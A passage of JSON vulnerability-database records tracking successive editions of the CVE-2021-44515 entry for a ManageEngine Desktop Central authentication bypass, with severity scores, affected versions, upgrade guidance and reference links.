"https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T05:26:37", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 51}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T05:56:01", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T05:56:01"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T05:56:01", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 52}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T06:25:39", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T05:56:01"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T06:25:39", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 53}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T06:25:45", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T06:25:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T06:25:45", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 54}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T06:55:37", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T06:25:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T06:55:37", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 55}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T06:55:46", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T06:25:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": 